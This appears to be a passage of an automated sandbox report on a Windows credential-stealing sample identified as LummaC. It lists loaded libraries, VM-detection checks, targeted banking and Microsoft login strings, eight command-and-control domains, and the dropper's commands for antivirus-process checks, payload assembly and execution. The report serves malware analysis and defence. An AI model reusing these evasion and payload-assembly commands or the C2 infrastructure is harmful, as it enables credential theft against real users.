Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: version.dll	Jump to behavior

Source: C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: Okfjk1hs4kdhs2.exe

Static file information: File size 1057550 > 1048576

Source: Okfjk1hs4kdhs2.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe

Code function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_004062FC

Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Code function: 11_2_005A8B75 push ecx; ret		11_2_005A8B88
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Code function: 11_2_0059CBF1 push eax; retf		11_2_0059CBF8

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Local\Temp\756341\Place.pif

Jump to dropped file

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Local\Temp\756341\Place.pif

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Code function: 11_2_006059B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		11_2_006059B3
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Code function: 11_2_00595EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		11_2_00595EDA

Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif

Code function: 11_2_005A33B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

11_2_005A33B7

Source: C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_11-100359

Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif

API coverage: 4.3 %

Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif TID: 4676	Thread sleep time: -180000s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif TID: 3228	Thread sleep time: -30000s >= -30000s			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe	Code function: 0_2_004062D5 FindFirstFileW,FindClose,	0_2_004062D5
Source: C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe	Code function: 0_2_00402E18 FindFirstFileW,	0_2_00402E18
Source: C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe	Code function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	0_2_00406C9B
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Code function: 11_2_005E4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	11_2_005E4005
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Code function: 11_2_005EC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	11_2_005EC2FF
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Code function: 11_2_005E494A GetFileAttributesW,FindFirstFileW,FindClose,	11_2_005E494A
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Code function: 11_2_005ECD14 FindFirstFileW,FindClose,	11_2_005ECD14
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Code function: 11_2_005ECD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	11_2_005ECD9F
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Code function: 11_2_005EF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	11_2_005EF5D8
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Code function: 11_2_005EF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	11_2_005EF735
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Code function: 11_2_005EFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	11_2_005EFA36
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Code function: 11_2_005E3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	11_2_005E3CE2

Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif

Code function: 11_2_00595D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

11_2_00595D13

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\756341\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\756341	Jump to behavior

Source: Place.pif, 0000000B.00000003.2627196222.0000000004427000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: Place.pif, 0000000B.00000003.2627196222.0000000004427000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: Place.pif, 0000000B.00000003.2627196222.0000000004427000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: Place.pif, 0000000B.00000003.2627196222.0000000004427000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: Place.pif, 0000000B.00000003.2627196222.0000000004427000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: Place.pif, 0000000B.00000003.2627196222.000000000442D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696428655p
Source: Place.pif, 0000000B.00000003.2627196222.0000000004427000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: Place.pif, 0000000B.00000002.2709566346.00000000043D2000.00000004.00000800.00020000.00000000.sdmp, Place.pif, 0000000B.00000003.2707961708.00000000043D2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Place.pif, 0000000B.00000003.2627196222.0000000004427000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: Place.pif, 0000000B.00000002.2709566346.00000000043D2000.00000004.00000800.00020000.00000000.sdmp, Place.pif, 0000000B.00000003.2707961708.00000000043D2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW(
Source: Place.pif, 0000000B.00000003.2627196222.0000000004427000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: Place.pif, 0000000B.00000003.2627196222.0000000004427000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: Place.pif, 0000000B.00000003.2708172110.00000000012DE000.00000004.00000020.00020000.00000000.sdmp, Place.pif, 0000000B.00000002.2709113133.00000000012DE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWP0>
Source: Place.pif, 0000000B.00000003.2627196222.0000000004427000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: Place.pif, 0000000B.00000003.2627196222.0000000004427000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: Place.pif, 0000000B.00000003.2627196222.0000000004427000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: Place.pif, 0000000B.00000003.2627196222.0000000004427000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: Place.pif, 0000000B.00000003.2627196222.0000000004427000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: Place.pif, 0000000B.00000003.2627196222.0000000004427000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: Place.pif, 0000000B.00000003.2627196222.0000000004427000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: Place.pif, 0000000B.00000003.2627196222.0000000004427000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: Place.pif, 0000000B.00000003.2627196222.0000000004427000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: Place.pif, 0000000B.00000003.2627196222.0000000004427000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: Place.pif, 0000000B.00000003.2627196222.0000000004427000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: Place.pif, 0000000B.00000003.2627196222.0000000004427000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: Place.pif, 0000000B.00000003.2627196222.0000000004427000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: Place.pif, 0000000B.00000003.2627196222.0000000004427000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: Place.pif, 0000000B.00000003.2627196222.0000000004427000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: Place.pif, 0000000B.00000003.2627196222.0000000004427000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: Place.pif, 0000000B.00000003.2627196222.0000000004427000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: Place.pif, 0000000B.00000003.2627196222.0000000004427000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: Place.pif, 0000000B.00000003.2627196222.000000000442D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: YNVMware
Source: Place.pif, 0000000B.00000003.2627196222.0000000004427000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: Place.pif, 0000000B.00000003.2627196222.0000000004427000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: Place.pif, 0000000B.00000003.2627196222.0000000004427000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: Place.pif, 0000000B.00000003.2627196222.0000000004427000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif

Code function: 11_2_005F45D5 BlockInput,

11_2_005F45D5

Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif

Code function: 11_2_00595240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

11_2_00595240

Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif

Code function: 11_2_005B5CAC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

11_2_005B5CAC

Source: C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe

Code function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_004062FC

Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif

Code function: 11_2_005D88CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

11_2_005D88CD

Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Code function: 11_2_005AA354 SetUnhandledExceptionFilter,		11_2_005AA354
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Code function: 11_2_005AA385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,		11_2_005AA385

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: Place.pif, 0000000B.00000002.2709912309.00000000047E1000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: servicedny.site
Source: Place.pif, 0000000B.00000002.2709912309.00000000047E1000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: authorisev.site
Source: Place.pif, 0000000B.00000002.2709912309.00000000047E1000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: faulteyotk.site
Source: Place.pif, 0000000B.00000002.2709912309.00000000047E1000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: dilemmadu.site
Source: Place.pif, 0000000B.00000002.2709912309.00000000047E1000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: contemteny.site
Source: Place.pif, 0000000B.00000002.2709912309.00000000047E1000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: goalyfeastz.site
Source: Place.pif, 0000000B.00000002.2709912309.00000000047E1000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: opposezmny.site
Source: Place.pif, 0000000B.00000002.2709912309.00000000047E1000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: seallysl.site

Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif

Code function: 11_2_005D9369 LogonUserW,

11_2_005D9369

Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif

Code function: 11_2_00595240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

11_2_00595240

Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif

Code function: 11_2_005E1AC6 SendInput,keybd_event,

11_2_005E1AC6

Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif

Code function: 11_2_005E51E2 mouse_event,

11_2_005E51E2

Source: C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Belly Belly.bat & Belly.bat	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 756341	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "MENTIONSTATICARGUEKEEPS" Abuse	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Significant + ..\Bow + ..\Olympics + ..\Intimate + ..\Tobago + ..\Suzuki + ..\Relevance V	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\756341\Place.pif Place.pif V	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif

11_2_005D88CD

Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif

Code function: 11_2_005E4F1C AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

11_2_005E4F1C

